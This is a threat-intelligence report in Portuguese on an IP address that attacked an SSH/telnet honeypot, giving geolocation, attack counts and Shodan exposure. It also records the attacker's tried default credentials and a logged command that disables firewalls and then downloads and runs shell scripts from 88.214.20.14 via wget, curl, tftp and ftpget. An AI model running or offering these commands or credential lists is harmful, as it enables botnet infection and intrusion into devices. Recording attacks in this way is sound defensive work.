Ameaca Ativa • MEDIO
176.65.148.214
Pais de Origem🇳🇱 Paises Bajos
Primeira Deteccao13/03/2026
Ultima Atividade08/04/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
659
Ataques Totais
🔌
2
Portas
📡
1
Tipos de Ataque
🦠
2
Malware
Geolocalizacao
- Pais
- 🇳🇱 Paises Bajos
- Cidade
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Tipos de Ataque
ssh_telnet_honeypot
Portas Atacadas
2223
Malware Associado
Credenciais Tentadas
🔐root/admin
3x🔐root/password
2x🔐root/default
2x🔐telnet/telnet
2x🔐admin/password
2x🔐cisco/cisco
2x🔐service/service
1x🔐netgear/netgear
1x🔐apc/apc
1x🔐root/root
1x🔐D-Link/admin
1x🔐root/vizxv
1x🔐asus/admin
1x🔐oracle/oracle
1x🔐root/666666
1xComandos Executados
$
pkill iptables -9; pkill firewalld -9; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh;curl -o sshbins.sh http://88.214.20.14/sshbins.sh; wget http://88.214.20.14/sshbins.sh; chmod 777 sshbins.sh; sh sshbins.sh; tftp 88.214.20.14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20.14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20.14 ftp1.sh ftp1.sh; sh ftp1.sh1x$
wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh1xExposicao Shodan InternetDBShodan
Dados InternetDB, nao em tempo real
Portas
22
Hostnames
176.65.148.214.ptr.pfcloud.network
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1
Avaliacao de Risco
55
/100
BaixoMedioAltoCritico